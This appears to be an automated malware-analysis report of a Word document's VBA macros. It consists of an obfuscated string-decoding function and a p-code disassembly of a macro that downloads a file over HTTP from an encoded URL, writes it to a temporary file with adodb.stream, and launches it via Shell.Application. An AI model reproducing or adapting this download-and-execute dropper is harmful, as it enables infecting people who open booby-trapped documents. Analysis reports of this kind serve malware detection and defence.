    If Len(ZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSI) < 5 Then
        QPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPX = ""
        Exit Function
    End If

    ZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSI = Mid(ZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSI, 3, Len(ZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSI) - 4)
    For i = 2 To Len(ZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSI) Step 2
        SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN = Asc(Mid(ZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSI, i, 1)) + JKJLEBETHZHJKGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWO
        If SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN > KCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSIUDJDCYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJ Then
            SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN = SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN - KCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSIUDJDCYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJ + PZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHY - 1
        End If
        KGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFE = KGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFE & Chr(SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN)
    Next
    QPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPX = KGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFE
End Function

Attribute VB_Name = "NewMacros"
Sub IM()
'
' IM Macro
'
'

End Sub

' Processing file: /tmp/qstore_agicygct
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4845 bytes
' Line #0:
' 	FuncDefn (Private Sub QPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPX())
' Line #1:
' 	Dim 
' 	VarDefn send
' Line #2:
' 	Dim 
' 	VarDefn MVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVY
' Line #3:
' 	SetStmt 
' 	LitStr 0x0011 "Shell.Application"
' 	ArgsLd CJHYGSSGKQFOEQYMYFCLDNGLOMRBILMRDZPPGJSWRHFFFHZDHPCCKFGCODSRIDNIEKPHHBBOSYMWMXHNHGDMKVOTWUZIJTUY 0x0001 
' 	Set MVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVY 
' Line #4:
' Line #5:
' 	Dim 
' 	VarDefn responseBody
' Line #6:
' 	SetStmt 
' 	LitStr 0x0011 "microsoft.xmlhttp"
' 	ArgsLd CJHYGSSGKQFOEQYMYFCLDNGLOMRBILMRDZPPGJSWRHFFFHZDHPCCKFGCODSRIDNIEKPHHBBOSYMWMXHNHGDMKVOTWUZIJTUY 0x0001 
' 	Set responseBody 
' Line #7:
' Line #8:
' 	LitStr 0x0003 "tmp"
' 	ArgsLd FOEQYMYFCLDNGLOMRBILMRDZPPGJSWRHFFFHZDHPCCKFGCODSRIDNIEKPHHBBOSYMWMXHNHGDMKVOTWUZIJTUYLCQXORBF 0x0001 
' 	LitStr 0x001E "%`$R*D`H'I6HaJeCf@~C@$.[anq[pY"
' 	ArgsLd Status 0x0001 
' 	Add 
' 	St send 
' Line #9:
' 	LitStr 0x0003 "GET"
' 	LitStr 0x0058 "Ucr^%j3jUf4iS0G%/%#mXm~mC$a_rdVlaeq_9Y![l$Mh`e-\SY2k&dbYz$pY\eWch%D7KY3Y{[of,j:$f[inp[gV"
' 	ArgsLd Status 0x0001 
' 	LitVarSpecial (False)
' 	Ld responseBody 
' 	ArgsMemCall Open 0x0003 
' Line #10:
' 	Ld responseBody 
' 	ArgsMemCall CYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJKGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIH 0x0000 
' Line #11:
' 	Ld responseBody 
' 	MemLd ZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSI 
' 	St SaveToFile 
' Line #12:
' 	Ld responseBody 
' 	MemLd KGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFE 
' 	LitDI2 0x00C8 
' 	Eq 
' 	IfBlock 
' Line #13:
' 	SetStmt 
' 	LitStr 0x000C "adodb.stream"
' 	ArgsLd CJHYGSSGKQFOEQYMYFCLDNGLOMRBILMRDZPPGJSWRHFFFHZDHPCCKFGCODSRIDNIEKPHHBBOSYMWMXHNHGDMKVOTWUZIJTUY 0x0001 
' 	Set SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN 
' Line #14:
' 	Ld SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN 
' 	ArgsMemCall Open 0x0000 
' Line #15:
' 	LitDI2 0x0001 
' 	Ld SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN 
' 	MemSt Type 
' Line #16:
' 	Ld SaveToFile 
' 	Ld SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN 
' 	ArgsMemCall Xor 0x0001 
' Line #17:
' 	Ld send 
' 	LitDI2 0x0002 
' 	Ld SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN 
' 	ArgsMemCall JKJLEBETHZHJKGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWO 0x0002 
' Line #18:
' 	Ld SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN 
' 	ArgsMemCall Close 0x0000 
' Line #19:
' 	EndIfBlock 
' Line #20:
' 	Ld send 
' 	Paren 
' 	Ld MVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVY 
' 	ArgsMemCall Open 0x0001 
' Line #21:
' Line #22:
' Line #23:
' 	EndSub 
' Line #24:
' Line #25:
' 	FuncDefn (Private Function Status(PZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHY, id_FFFE As Variant))
' Line #26:
' 	Dim 
' 	VarDefn KCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSIUDJDCYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJ
' Line #27:
' 	Dim 
' 	VarDefn Asc
' Line #28:
' 	Dim (Const) 
' 	LitDI2 0x000A 
' 	VarDefn id_028C
' Line #29:
' 	Dim (Const) 
' 	LitDI2 0x0021 
' 	VarDefn id_028E
' Line #30:
' 	Dim (Const) 
' 	LitDI2 0x007E 
' 	VarDefn id_0290
' Line #31:
' Line #32:
' 	Ld PZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHY 
' 	FnLen 
' 	LitDI2 0x0005 
' 	Lt 
' 	IfBlock 
' Line #33:
' 	LitStr 0x0000 ""
' 	St Status 
' Line #34:
' 	ExitFunc 
' Line #35:
' 	EndIfBlock 
' Line #36:
' Line #37:
' 	Ld PZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHY 
' 	LitDI2 0x0003 
' 	Ld PZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHY 
' 	FnLen 
' 	LitDI2 0x0004 
' 	Sub 
' 	ArgsLd Mid 0x0003 
' 	St PZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHY 
' Line #38:
' 	StartForVariable 
' 	Ld _B_var_Chr 
' 	EndForVariable 
' 	LitDI2 0x0002 
' 	Ld PZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHY 
' 	FnLen 
' 	LitDI2 0x0002 
' 	ForStep 
' Line #39:
' 	Ld PZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHY 
' 	Ld _B_var_Chr 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	ArgsLd id_0292 0x0001 
' 	Ld id_028C 
' 	Add 
' 	St Asc 
' Line #40:
' 	Ld Asc 
' 	Ld id_0290 
' 	Gt 
' 	IfBlock 
' Line #41:
' 	Ld Asc 
' 	Ld id_0290 
' 	Sub 
' 	Ld id_028E 
' 	Add 
' 	LitDI2 0x0001 
' 	Sub 
' 	St Asc 
' Line #42:
' 	EndIfBlock 
' Line #43:
' 	Ld KCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSIUDJDCYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJ 
' 	Ld Asc 
' 	ArgsLd RTBGQXQKXJIWNVOQEQWTDBMXKGEJSZKEJUSHIXILOJZEEDGRUYNTTCEFBNURJZBLZCJHYGSSGKQFOEQYMYFCLDNGLOMRB 0x0001 
' 	Concat 
' 	St KCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSIUDJDCYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJ 
' Line #44:
' 	StartForVariable 
' 	Next 
' Line #45:
' 	Ld KCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSIUDJDCYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJ 
' 	St Status 
' Line #46:
' 	EndFunc 
' Macros/VBA/NewMacros - 1013 bytes
' Line #0:
' 	FuncDefn (Sub EEDGRUYNTTCEFBNURJZBLZCJHYGSSGKQFOEQYMYFCLDNGLOMRBILMRDZPPGJSWRHFFFHZDHPCCKFGCODSRIDNIE())
' Line #1:
' 	QuoteRem 0x0000 0x0000 ""
' Line #2:
' 	QuoteRem 0x0000 0x0009 " IM Macro"
' Line #3:
' 	QuoteRem 0x0000 0x0000 ""
' Line #4:
' 	QuoteRem 0x0000 0x0000 ""
' Line #5:
' Line #6:
' 	EndSub

Open this report in the interactive analyzer, or submit your own file for analysis.